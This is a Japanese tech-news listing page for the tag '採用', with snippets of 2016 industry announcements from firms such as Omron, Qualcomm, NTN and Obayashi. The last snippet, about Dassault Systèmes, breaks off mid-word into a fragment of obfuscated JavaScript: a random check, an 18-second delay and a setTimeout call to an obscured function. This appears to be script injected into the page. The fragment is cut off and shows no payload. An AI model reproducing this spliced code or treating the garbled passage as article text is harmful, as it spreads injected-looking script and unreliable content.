『採用』の記事一覧 : 596件

 青森県の八戸市にある三菱製紙の「八戸工場」は専用の岸壁まで備えている。海外から輸入する木質チップなどを原料に、パルプから紙まで一貫生産できる国内有数の製紙工場だ(図1)。この工場の構内に日本で最大級の木質バイオマス発電...

 プロトラブズは2016年10月11日、日本国内における事業拡大に関して記者発表を開催した。同社は米国に本社を置く、試作・小ロット部品製作を専門とする企業で、Web上での自動見積もりおよび発注サービスを展開する。同社日本...

 オムロンは2016年10月3日、共通の設計コンセプトで仕様を統一したFA機器の第2弾として、7カテゴリー1万5583形式を発売した。押しボタンスイッチなど、制御盤前面に取り付ける機器で仕様を統一し、独自の配線方式「プッ...

ヒューマンマシンインタフェース技術の進化を支える  Synaptics(シナプティクス)は2016年10月13日、車載システム向けの事業戦略および新製品に関する記者会見を東京都内で開催した。  同社は、タッチスクリーンコ...

2025年までの長期販売もサポート  Qualcommは2016年9月28日(米国時間)、携帯端末に展開されてきたプロセッサ「Snapdragon 410E」「Snapdragon 600E」を、市場が拡大するIoT(モ...

スマートウェアの配線としての「ロボ電」の適用イメージ  旭化成の繊維事業本部は、「CEATEC JAPAN 2016」(2016年10月4〜7日、幕張メッセ)において、伸び縮みが可能な電線「ROBODEN(ロボ電)」のウ...

 ネットワンシステムズは2016年9月23日、三菱重工エンジン&ターボチャージャ(MHIET)の相模原地区第三工場において、IoT(モノのインターネット)活用を可能にするネットワーク基盤を構築したと発表した。製造ラインお...

 NTNは2016年9月26日、工作機械用の小型スピンドルに使用する玉軸受「ULTAGEシリーズ 工作機械主軸用小径高速アンギュラ玉軸受」を開発したと発表した。小型スピンドルの振動を抑えるとともに寿命を引き延ばす効果を見...

耐熱性に優れた白金ナノ構造を採用  千葉工業大学(千葉工大)工学部機械電子創成工学科の菅洋志助教は2016年10月、産業技術総合研究所(産総研)ナノエレクトロニクス研究部門の内藤泰久主任研究員及び物質・材料研究機構(物材...

 大林組と大裕は2016年10月5日、バックホーなどの建設機械を遠隔から操作し、無人状態で作業を行える遠隔操縦装置「サロゲート」を共同開発したと発表した。着脱式のシステムとなっており、建設機械自体を改造することなく使える...

 ジェイテクトは2016年9月26日、樹脂保持器の形状を工夫することで、従来比1.3倍の高速回転対応を可能にした深溝玉軸受を開発したと発表した。ハイブリットカー(HV)や電気自動車(EV)のモーター向けで、年間2億円の売...

 仏ダッソー・システムズは2016年9月6日、船舶設計大手のイタリアNAOS Ship andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0)...